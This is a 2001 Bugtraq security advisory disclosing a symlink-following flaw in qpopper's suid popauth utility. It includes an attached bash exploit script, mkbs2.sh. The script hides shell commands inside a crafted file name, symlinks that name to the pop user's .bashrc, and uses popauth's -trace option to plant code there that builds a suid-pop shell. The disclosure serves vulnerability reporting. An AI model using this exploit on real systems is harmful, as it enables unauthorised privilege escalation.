[23542] in bugtraq
Advisory: popauth
daemon@ATHENA.MIT.EDU (Paul Starzetz)
Mon Dec 17 22:41:07 2001
Message-ID: <3C1E775E.8E79F626@starzetz.de>
Date: Mon, 17 Dec 2001 23:53:18 +0100
From: Paul Starzetz <paul@starzetz.de>
MIME-Version: 1.0
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Content-Type: multipart/mixed;
boundary="------------50454D7A3503FA206F88387D"
--------------50454D7A3503FA206F88387D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
there is a symlink problem in the popauth utility, which is part of the
qpoper package. The binary is often istalled suid pop and follows
symlinks in the -trace file option.
This problem has been reported to vendors in June 2001.
Impact: in case of suid popauth and valid shell for user pop, the
attached script will create suid-pop shell, if someone su to pop. This
may happen as a part of some automated check script (startup script).
This vulnerability is not very crucial, however it should be reported at
least once.
/ih
--------------50454D7A3503FA206F88387D
Content-Type: application/x-sh;
name="mkbs2.sh"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="mkbs2.sh"
#!/bin/bash
# popauth symlink follow vuln by IhaQueR
# this will create .bashrc for user pop
# and ~pop/sup suid shell
FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \"#include <stdio.h>\nmain(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""')
ln -s /var/lib/pop/.bashrc "$FILE"
/usr/sbin/popauth -trace "$FILE"
--------------50454D7A3503FA206F88387D--
